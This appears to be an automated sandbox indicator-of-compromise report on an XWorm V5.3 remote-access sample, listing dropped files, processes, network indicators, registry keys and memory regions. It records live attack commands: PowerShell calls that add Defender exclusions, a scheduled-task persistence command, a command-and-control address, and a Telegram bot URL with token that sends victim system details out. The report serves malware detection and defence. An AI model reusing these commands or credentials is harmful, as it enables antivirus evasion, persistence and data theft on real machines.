IOC Report
Output.exe

loading gif

Files

File Path
Type
Category
Malicious
Output.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
initial sample
malicious
C:\ProgramData\XClient.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\ProgramData\build.exe
PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\mstc.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Output.exe.log
CSV text
dropped
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\mstc.exe.log
CSV text
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
modified
C:\Users\user\AppData\Local\Temp\Log.tmp
ASCII text, with CRLF line terminators
modified
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0drb40ud.k5o.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0gn3glvf.qj1.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1mljleyk.xan.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4fgr5rg2.rno.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5emqyhj1.l4k.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cff3fhm4.auj.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_efjlq1gg.mgg.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ica10m5q.k1f.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jhg5xajd.jc3.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nl01sg4m.emc.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ny524qb5.ubn.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oo42gmop.huk.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sbfoqrud.h2b.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_voejhd0j.g1g.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x1gijp3l.4jg.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zwmutoam.l5z.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mstc.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Apr 23 23:53:12 2024, mtime=Tue Apr 23 23:53:12 2024, atime=Tue Apr 23 23:53:12 2024, length=85504, window=hide
dropped
There are 15 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\Output.exe
"C:\Users\user\Desktop\Output.exe"
malicious
C:\ProgramData\XClient.exe
"C:\ProgramData\XClient.exe"
malicious
C:\ProgramData\build.exe
"C:\ProgramData\build.exe"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\XClient.exe'
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\mstc.exe'
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'mstc.exe'
malicious
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "mstc" /tr "C:\Users\user\AppData\Local\Temp\mstc.exe"
malicious
C:\Users\user\AppData\Local\Temp\mstc.exe
C:\Users\user\AppData\Local\Temp\mstc.exe
malicious
C:\Users\user\AppData\Local\Temp\mstc.exe
"C:\Users\user\AppData\Local\Temp\mstc.exe"
malicious
C:\Users\user\AppData\Local\Temp\mstc.exe
"C:\Users\user\AppData\Local\Temp\mstc.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
There are 7 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://pesterbdd.com/images/Pester.png
unknown
malicious
91.92.252.220:9078
malicious
91.92.252.220
malicious
https://api.ipify.orgcookies//settinString.Removeg
unknown
malicious
127.0.0.1
malicious
https://ipinfo.io/ip%appdata%
unknown
https://api.telegram.org/bot2128988424:AAEkYnwvOQA95riqRZwlqBxg4GV-odRNOyo/sendMessage?chat_id=966649672&text=%E2%98%A0%20%5BXWorm%20V5.3%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A09B6D1F69BB0E33E6F7A%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%203TYHZ%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.3
149.154.167.220
http://nuget.org/NuGet.exe
unknown
http://tempuri.org/Endpoint/CheckConnectLR
unknown
http://91.92.252.220:9078
unknown
https://api.telegram.org/bot
unknown
http://schemas.xmlsoap.org/soap/encoding/
unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
unknown
http://tempuri.org/Endpoint/CheckConnectResponse
unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
http://www.micom/pkiops/Docs/ry.htm0
unknown
https://api.ip.sb/geoip%USERPEnvironmentROFILE%
unknown
http://www.microsoft.co
unknown
https://contoso.com/License
unknown
http://schemas.xmlsoap.org/soap/envelope/
unknown
https://contoso.com/Icon
unknown
http://osoft.co
unknown
http://91.92.252.220:9078/
unknown
http://tempuri.org/
unknown
http://tempuri.org/Endpoint/CheckConnect
unknown
http://tempuri.org/Endpoint/EnvironmentSettingsLR
unknown
http://tempuri.org/Endpoint/VerifyUpdateResponse
unknown
http://tempuri.org/Endpoint/SetEnvironmentResponse
unknown
https://github.com/Pester/Pester
unknown
http://crl.m
unknown
http://tempuri.org/Endpoint/SetEnvironmentLR
unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing
unknown
http://tempuri.org/Endpoint/GetUpdatesLR
unknown
http://tempuri.org/Endpoint/VerifyUpdateLR
unknown
http://tempuri.org/Endpoint/GetUpdatesResponse
unknown
http://schemas.xmlsoap.org/wsdl/
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
http://tempuri.org/Endpoint/
unknown
http://tempuri.org/Endpoint/EnvironmentSettingsResponse
unknown
http://tempuri.org/Endpoint/CheckConnectT
unknown
http://tempuri.org/0
unknown
https://aka.ms/pscore68
unknown
http://api.telegram.org
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://schemas.xmlsoap.org/soap/actor/next
unknown
http://ip-api.com/line/?fields=hosting
208.95.112.1
There are 38 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
ip-api.com
208.95.112.1
api.telegram.org
149.154.167.220

IPs

IP
Domain
Country
Malicious
91.92.252.220
unknown
Bulgaria
malicious
127.0.0.1
unknown
unknown
malicious
208.95.112.1
ip-api.com
United States
149.154.167.220
api.telegram.org
United Kingdom

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
mstc
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\XClient_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\XClient_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\XClient_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\XClient_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\XClient_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\XClient_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\XClient_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\XClient_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\XClient_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\XClient_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\XClient_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\XClient_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\XClient_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\XClient_RASMANCS
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\build_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\build_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\build_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\build_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\build_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\build_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\build_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\build_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\build_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\build_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\build_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\build_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\build_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\build_RASMANCS
FileDirectory
There are 20 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
2961000
trusted library allocation
page read and write
malicious
29F0000
trusted library allocation
page read and write
malicious
342000
unkown
page readonly
malicious
12428000
trusted library allocation
page read and write
malicious
7B2000
unkown
page readonly
malicious
2A5D000
trusted library allocation
page read and write
malicious
29DC000
trusted library allocation
page read and write
malicious
12961000
trusted library allocation
page read and write
malicious
7FF8870A0000
trusted library allocation
page read and write
7FF886EF2000
trusted library allocation
page read and write
DEA000
heap
page read and write
2F7E9B9000
stack
page read and write
BA6303000
stack
page read and write
D20868C000
stack
page read and write
1B2F0000
heap
page execute and read and write
177CE282000
trusted library allocation
page read and write
7FF886E06000
trusted library allocation
page execute and read and write
BA78CC000
stack
page read and write
1CD33020000
trusted library allocation
page read and write
1CD4A3F0000
heap
page read and write
1B2F3000
heap
page execute and read and write
1A7DD000
stack
page read and write
177DD251000
trusted library allocation
page read and write
D2077B9000
stack
page read and write
1368F01D000
trusted library allocation
page read and write
7FF887110000
trusted library allocation
page read and write
1CD4A520000
trusted library allocation
page read and write
242CDCC0000
heap
page read and write
1C574000
heap
page read and write
7FF8870C0000
trusted library allocation
page read and write
7FF886DC6000
trusted library allocation
page read and write
7FF886DC0000
trusted library allocation
page execute and read and write
4F11000
trusted library allocation
page read and write
7FF886FC0000
trusted library allocation
page read and write
7FF887190000
trusted library allocation
page read and write
7FF886D21000
trusted library allocation
page read and write
1368FBA1000
trusted library allocation
page read and write
7FF886E30000
trusted library allocation
page execute and read and write
7FF886F18000
trusted library allocation
page read and write
1CD32B55000
trusted library allocation
page read and write
7FF886D24000
trusted library allocation
page read and write
242D1151000
trusted library allocation
page read and write
6F7000
stack
page read and write
574000
heap
page read and write
1040000
heap
page read and write
1BE2D000
stack
page read and write
1369E421000
trusted library allocation
page read and write
4F30000
trusted library allocation
page read and write
4FD0000
trusted library allocation
page read and write
7FF886D10000
trusted library allocation
page read and write
130000
unkown
page readonly
2853000
trusted library allocation
page read and write
177E56A0000
heap
page read and write
1CD33660000
trusted library allocation
page read and write
2F7F70D000
stack
page read and write
7FF887140000
trusted library allocation
page execute and read and write
4F4000
stack
page read and write
7FF887000000
trusted library allocation
page read and write
7FF88713E000
trusted library allocation
page read and write
24AD000
stack
page read and write
7FF886FA0000
trusted library allocation
page read and write
7FF886D20000
trusted library allocation
page read and write
7FF886EF4000
trusted library allocation
page read and write
177CEAE3000
trusted library allocation
page read and write
177CB774000
heap
page read and write
29EE000
trusted library allocation
page read and write
CC6000
heap
page read and write
4F80000
trusted library allocation
page read and write
2AA5000
trusted library allocation
page read and write
7FF886DF6000
trusted library allocation
page execute and read and write
1F0000
heap
page read and write
7FF887030000
trusted library allocation
page read and write
1368F066000
trusted library allocation
page read and write
7FF886D23000
trusted library allocation
page execute and read and write
1CD32EF2000
trusted library allocation
page read and write
7FF886D13000
trusted library allocation
page execute and read and write
272C000
trusted library allocation
page read and write
13690240000
trusted library allocation
page read and write
BA6877000
stack
page read and write
2726000
trusted library allocation
page read and write
5584C8D000
stack
page read and write
920000
heap
page read and write
242CDBC0000
heap
page read and write
177E58AC000
heap
page read and write
1368F726000
trusted library allocation
page read and write
558423B000
stack
page read and write
242E7DDB000
heap
page read and write
7DF4064B0000
trusted library allocation
page execute and read and write
7FF886F10000
trusted library allocation
page read and write
1B2A0000
heap
page read and write
242E7D3F000
heap
page read and write
5583B7E000
stack
page read and write
1368C930000
heap
page read and write
7FF886D1D000
trusted library allocation
page execute and read and write
7FF886EEA000
trusted library allocation
page read and write
5E40000
heap
page read and write
7FF887030000
trusted library allocation
page read and write
7FF886ED0000
trusted library allocation
page read and write
7FF887150000
trusted library allocation
page read and write
1B3E0000
heap
page read and write
6E0000
heap
page read and write
132000
unkown
page readonly
7FF886DD0000
trusted library allocation
page execute and read and write
242D0B07000
trusted library allocation
page read and write
7FF886DE0000
trusted library allocation
page execute and read and write
7FF886F12000
trusted library allocation
page read and write
1050000
heap
page execute and read and write
2A29000
trusted library allocation
page read and write
242D0691000
trusted library allocation
page read and write
1CD329C8000
trusted library allocation
page read and write
7FF886FB0000
trusted library allocation
page read and write
242E7D00000
heap
page execute and read and write
1CD30520000
heap
page read and write
14E0000
trusted library allocation
page read and write
1CD4A664000
heap
page read and write
C5C000
heap
page read and write
242E80A2000
heap
page read and write
6E5000
heap
page read and write
242CDD9C000
heap
page read and write
7B0000
unkown
page readonly
7FF886EC0000
trusted library allocation
page read and write
7FF886FE0000
trusted library allocation
page read and write
EB0000
trusted library allocation
page read and write
D20848C000
stack
page read and write
606000
heap
page read and write
1B07E000
stack
page read and write
7FF886DEC000
trusted library allocation
page execute and read and write
177E5650000
heap
page execute and read and write
242E8093000
heap
page read and write
7FF887170000
trusted library allocation
page read and write
1AF7F000
stack
page read and write
4B00000
trusted library allocation
page read and write
91E000
stack
page read and write
1B078000
heap
page read and write
242E7DB0000
heap
page read and write
20F0000
heap
page execute and read and write
7FF886EB2000
trusted library allocation
page read and write
1CD303D7000
heap
page read and write
1D0000
heap
page read and write
7FF886D1D000
trusted library allocation
page execute and read and write
7FF887064000
trusted library allocation
page read and write
1BD00000
heap
page execute and read and write
242CDD58000
heap
page read and write
1B8F0000
heap
page read and write
3151000
trusted library allocation
page read and write
1CD32E04000
trusted library allocation
page read and write
136A6A00000
heap
page execute and read and write
1CD32D4A000
trusted library allocation
page read and write
7FF886F30000
trusted library allocation
page read and write
7FF886DD0000
trusted library allocation
page read and write
521E000
stack
page read and write
1368F134000
trusted library allocation
page read and write
1368FC87000
trusted library allocation
page read and write
11C0000
heap
page read and write
7FF886D1D000
trusted library allocation
page execute and read and write
D2075FD000
stack
page read and write
5583E79000
stack
page read and write
12A51000
trusted library allocation
page read and write
7FF886D44000
trusted library allocation
page read and write
546000
heap
page read and write
D207739000
stack
page read and write
760000
heap
page read and write
177E58A8000
heap
page read and write
1CD4A748000
heap
page read and write
CC0000
trusted library allocation
page read and write
24C0000
trusted library allocation
page read and write
55840BF000
stack
page read and write
C56000
heap
page read and write
2721000
trusted library allocation
page read and write
177CEB9C000
trusted library allocation
page read and write
242CF660000
trusted library allocation
page read and write
21FF000
stack
page read and write
7FF886F70000
trusted library allocation
page read and write
177CD010000
heap
page readonly
28EE000
stack
page read and write
1CD304F0000
heap
page readonly
242DFAEA000
trusted library allocation
page read and write
6D0000
heap
page read and write
12A8000
heap
page read and write
1CD3229D000
trusted library allocation
page read and write
177DD538000
trusted library allocation
page read and write
7FF886F70000
trusted library allocation
page read and write
4F70000
trusted library allocation
page read and write
2F7E777000
stack
page read and write
242E7F2F000
heap
page read and write
285A000
trusted library allocation
page read and write
1CD4A3A4000
heap
page read and write
1B983000
heap
page read and write
7FF886EC0000
trusted library allocation
page read and write
1CD41E01000
trusted library allocation
page read and write
BA76CE000
stack
page read and write
1CA7D000
stack
page read and write
D20737E000
stack
page read and write
23FA000
trusted library allocation
page execute and read and write
1BC2F000
stack
page read and write
1369E7FF000
trusted library allocation
page read and write
4F20000
trusted library allocation
page read and write
1C42C000
stack
page read and write
2402000
trusted library allocation
page read and write
7FF886D30000
trusted library allocation
page read and write
7FF886D6C000
trusted library allocation
page execute and read and write
24D0000
heap
page read and write
2400000
trusted library allocation
page read and write
242E8220000
heap
page read and write
4F41000
trusted library allocation
page read and write
2F7E8BE000
stack
page read and write
7FF886D14000
trusted library allocation
page read and write
1368F541000
trusted library allocation
page read and write
177E58BC000
heap
page read and write
4F02000
trusted library allocation
page read and write
7FF887060000
trusted library allocation
page read and write
BA63CF000
stack
page read and write
1368C9C9000
heap
page read and write
1368E4A7000
trusted library allocation
page read and write
242E7E05000
heap
page read and write
1368F38F000
trusted library allocation
page read and write
1AECD000
stack
page read and write
7FF886F50000
trusted library allocation
page read and write
7FF886EC1000
trusted library allocation
page read and write
1368F6C4000
trusted library allocation
page read and write
1B3E3000
heap
page read and write
314E000
stack
page read and write
1131000
stack
page read and write
7FF886E30000
trusted library allocation
page execute and read and write
1CD303CE000
heap
page read and write
23F0000
trusted library allocation
page read and write
C7B000
heap
page read and write
177DD53E000
trusted library allocation
page read and write
7FF887080000
trusted library allocation
page read and write
136A642D000
heap
page read and write
242DF871000
trusted library allocation
page read and write
1B945000
heap
page read and write
1368F393000
trusted library allocation
page read and write
177E58E2000
heap
page read and write
18812010000
heap
page read and write
7FF886FE0000
trusted library allocation
page read and write
4B04000
trusted library allocation
page read and write
C00000
heap
page read and write
2950000
heap
page read and write
291E000
stack
page read and write
1CD4A660000
heap
page read and write
1368E370000
heap
page read and write
1368FFA2000
trusted library allocation
page read and write
242D15DD000
trusted library allocation
page read and write
7FF886EE1000
trusted library allocation
page read and write
7FF887075000
trusted library allocation
page read and write
4EDE000
stack
page read and write
7FF886D6C000
trusted library allocation
page execute and read and write
7FF886F20000
trusted library allocation
page execute and read and write
6A7000
heap
page read and write
EC5000
heap
page read and write
177CF076000
trusted library allocation
page read and write
7FF886D4B000
trusted library allocation
page read and write
7FF887170000
trusted library allocation
page read and write
B11000
stack
page read and write
177E59D9000
heap
page read and write
8DE000
heap
page read and write
136A6987000
heap
page read and write
1C32C000
stack
page read and write
2F7F80C000
stack
page read and write
1368C948000
heap
page read and write
2AEE000
trusted library allocation
page read and write
242DFAF0000
trusted library allocation
page read and write
7FF8870A0000
trusted library allocation
page read and write
4B10000
heap
page execute and read and write
5030000
trusted library allocation
page read and write
1CFBE000
stack
page read and write
177CD71D000
trusted library allocation
page read and write
7FF887180000
trusted library allocation
page read and write
C74000
heap
page read and write
177CB6E5000
heap
page read and write
2410000
heap
page execute and read and write
242D057F000
trusted library allocation
page read and write
7FF887140000
trusted library allocation
page read and write
9E0000
heap
page read and write
1CD420C1000
trusted library allocation
page read and write
242E803F000
heap
page read and write
242D1622000
trusted library allocation
page read and write
614000
heap
page read and write
9B7000
heap
page read and write
1CD3048D000
heap
page read and write
EEE000
stack
page read and write
1368E375000
heap
page read and write
315F000
trusted library allocation
page read and write
177CB735000
heap
page read and write
242E7C50000
heap
page execute and read and write
242E7D28000
heap
page read and write
7FF887100000
trusted library allocation
page read and write
7FF886D34000
trusted library allocation
page read and write
A10000
trusted library allocation
page read and write
1B9AB000
heap
page read and write
1CD420CB000
trusted library allocation
page read and write
7FF886FF0000
trusted library allocation
page read and write
242E7E30000
heap
page read and write
242E80A4000
heap
page read and write
7FF886D1D000
trusted library allocation
page execute and read and write
7FF887120000
trusted library allocation
page read and write
1D3BE000
stack
page read and write
1CD32D41000
trusted library allocation
page read and write
1B36E000
stack
page read and write
D2076BE000
stack
page read and write
2AC7000
trusted library allocation
page read and write
177CB778000
heap
page read and write
177CB6E0000
heap
page read and write
BA69F9000
stack
page read and write
7FF887170000
trusted library allocation
page read and write
11E8000
heap
page read and write
7FF887020000
trusted library allocation
page read and write
7FF887030000
trusted library allocation
page read and write
95F000
heap
page read and write
7FF886D10000
trusted library allocation
page read and write
18811F20000
heap
page read and write
7FF887078000
trusted library allocation
page read and write
7B5000
heap
page read and write
242E7808000
heap
page read and write
7FF886DC0000
trusted library allocation
page read and write
BA6CFB000
stack
page read and write
D27000
heap
page read and write
7FF887180000
trusted library allocation
page read and write
177DD2BF000
trusted library allocation
page read and write
7FF886EF0000
trusted library allocation
page read and write
D20793E000
stack
page read and write
7DF433300000
trusted library allocation
page execute and read and write
2A97000
trusted library allocation
page read and write
2F7F789000
stack
page read and write
7FF8871A0000
trusted library allocation
page read and write
1CD4A76C000
heap
page read and write
1368F383000
trusted library allocation
page read and write
7FF886F20000
trusted library allocation
page read and write
1B26F000
stack
page read and write
7FF886D3D000
trusted library allocation
page execute and read and write
7FF887180000
trusted library allocation
page read and write
8D0000
heap
page read and write
1CD30390000
heap
page read and write
7FF88707A000
trusted library allocation
page read and write
1AE60000
heap
page execute and read and write
5E82000
heap
page read and write
7FF886EE0000
trusted library allocation
page execute and read and write
BA67FE000
stack
page read and write
242D076E000
trusted library allocation
page read and write
1CD32D35000
trusted library allocation
page read and write
1B46E000
stack
page read and write
7FF887090000
trusted library allocation
page read and write
7FF887190000
trusted library allocation
page read and write
1CD4A66E000
heap
page read and write
242E7DD7000
heap
page read and write
7FF887084000
trusted library allocation
page read and write
7FF887060000
trusted library allocation
page read and write
7FF887160000
trusted library allocation
page read and write
1AD0F000
stack
page read and write
1368F3A0000
trusted library allocation
page read and write
4EF6000
trusted library allocation
page read and write
1CD30490000
trusted library section
page read and write
2AB1000
trusted library allocation
page read and write
177CB72D000
heap
page read and write
7FF886F90000
trusted library allocation
page read and write
177CB716000
heap
page read and write
177CD2D7000
trusted library allocation
page read and write
CC0000
heap
page read and write
7FF886D30000
trusted library allocation
page read and write
7FF8870A0000
trusted library allocation
page read and write
1705000
heap
page read and write
242D0BC1000
trusted library allocation
page read and write
13158000
trusted library allocation
page read and write
271B000
trusted library allocation
page read and write
7FF887020000
trusted library allocation
page read and write
7FF887040000
trusted library allocation
page read and write
7FF886D7C000
trusted library allocation
page execute and read and write
7FF886F90000
trusted library allocation
page read and write
2A14000
trusted library allocation
page read and write
7FF886F50000
trusted library allocation
page read and write
1B74E000
stack
page read and write
177E56F6000
heap
page read and write
7FF886E20000
trusted library allocation
page execute and read and write
7FF887011000
trusted library allocation
page read and write
1CD304A0000
trusted library allocation
page read and write
710000
heap
page read and write
7FF886F80000
trusted library allocation
page read and write
4AF0000
trusted library allocation
page read and write
177CD240000
heap
page execute and read and write
D2074FE000
stack
page read and write
2A64000
trusted library allocation
page read and write
1368F38B000
trusted library allocation
page read and write
5C1F000
stack
page read and write
D16000
heap
page read and write
7FF887084000
trusted library allocation
page read and write
710000
heap
page read and write
136A6BD0000
heap
page read and write
7FF886ED0000
trusted library allocation
page execute and read and write
177CD050000
heap
page read and write
177CCFC0000
trusted library section
page read and write
1368E3B0000
trusted library allocation
page read and write
7FF886F50000
trusted library allocation
page read and write
7FF886FB0000
trusted library allocation
page read and write
1B6DD000
stack
page read and write
1B4EB000
stack
page read and write
7FF886D33000
trusted library allocation
page read and write
1C576000
heap
page read and write
7FF886F30000
trusted library allocation
page read and write
242CDDDB000
heap
page read and write
121A000
heap
page read and write
5583D79000
stack
page read and write
2F7F68E000
stack
page read and write
1AEED000
stack
page read and write
54FE000
stack
page read and write
A00000
trusted library allocation
page read and write
177CB74D000
heap
page read and write
B20000
heap
page read and write
1368CA15000
heap
page read and write
177E58A0000
heap
page read and write
271E000
trusted library allocation
page read and write
7FF886F12000
trusted library allocation
page read and write
7FF886D40000
trusted library allocation
page read and write
177CDFC2000
trusted library allocation
page read and write
D20840E000
stack
page read and write
136A6C52000
heap
page read and write
242D0A11000
trusted library allocation
page read and write
242E7D62000
heap
page read and write
7FF887010000
trusted library allocation
page read and write
BA6A7B000
stack
page read and write
242CFA29000
trusted library allocation
page read and write
1CD30320000
heap
page read and write
242D09D8000
trusted library allocation
page read and write
1368F1E0000
trusted library allocation
page read and write
1369E451000
trusted library allocation
page read and write
1BB30000
heap
page read and write
6DF000
stack
page read and write
136A68C0000
heap
page read and write
1368E350000
trusted library allocation
page read and write
7FF886DCC000
trusted library allocation
page execute and read and write
177CB733000
heap
page read and write
7FF886ED0000
trusted library allocation
page execute and read and write
7FF886FD0000
trusted library allocation
page read and write
5584D87000
stack
page read and write
C70000
heap
page read and write
1CD31DD1000
trusted library allocation
page read and write
7FF886D20000
trusted library allocation
page read and write
225F000
trusted library allocation
page read and write
2F7E57E000
stack
page read and write
7DF4EE7B0000
trusted library allocation
page execute and read and write
136A6D0B000
heap
page read and write
5D1E000
stack
page read and write
130000
unkown
page readonly
2F7E6FE000
stack
page read and write
177E59BA000
heap
page read and write
2420000
trusted library allocation
page read and write
177E596F000
heap
page read and write
136A6D12000
heap
page read and write
177E5A21000
heap
page read and write
1CD4A2C6000
heap
page execute and read and write
7FF886D24000
trusted library allocation
page read and write
8BE000
stack
page read and write
7FF886D03000
trusted library allocation
page execute and read and write
1368F02E000
trusted library allocation
page read and write
29AA000
trusted library allocation
page read and write
7FF886EC1000
trusted library allocation
page read and write
242DF801000
trusted library allocation
page read and write
D63000
heap
page read and write
7FF887095000
trusted library allocation
page read and write
1CD4A34F000
heap
page read and write
1CD329BA000
trusted library allocation
page read and write
7FF886D4B000
trusted library allocation
page execute and read and write
7FF886F61000
trusted library allocation
page read and write
7FF887170000
trusted library allocation
page read and write
2A93000
trusted library allocation
page read and write
177E57C0000
heap
page read and write
7FF886DC6000
trusted library allocation
page read and write
7FF886E30000
trusted library allocation
page execute and read and write
7FF886EE0000
trusted library allocation
page execute and read and write
242E7D58000
heap
page read and write
7B0000
heap
page read and write
7FF886D6C000
trusted library allocation
page execute and read and write
242E808B000
heap
page read and write
7DF433310000
trusted library allocation
page execute and read and write
4FE0000
trusted library allocation
page execute and read and write
177CE611000
trusted library allocation
page read and write
2A10000
trusted library allocation
page read and write
1AE7E000
stack
page read and write
1368E8EE000
trusted library allocation
page read and write
7FF887000000
trusted library allocation
page read and write
D2C000
heap
page read and write
CF6000
heap
page read and write
9E5000
heap
page read and write
6BE000
heap
page read and write
242CDDAE000
heap
page read and write
1368E340000
heap
page readonly
2A51000
trusted library allocation
page read and write
7FF886DCE000
trusted library allocation
page execute and read and write
177CEAB8000
trusted library allocation
page read and write
1CD4A2C0000
heap
page execute and read and write
7FF886DE0000
trusted library allocation
page execute and read and write
1245000
heap
page read and write
7FF887069000
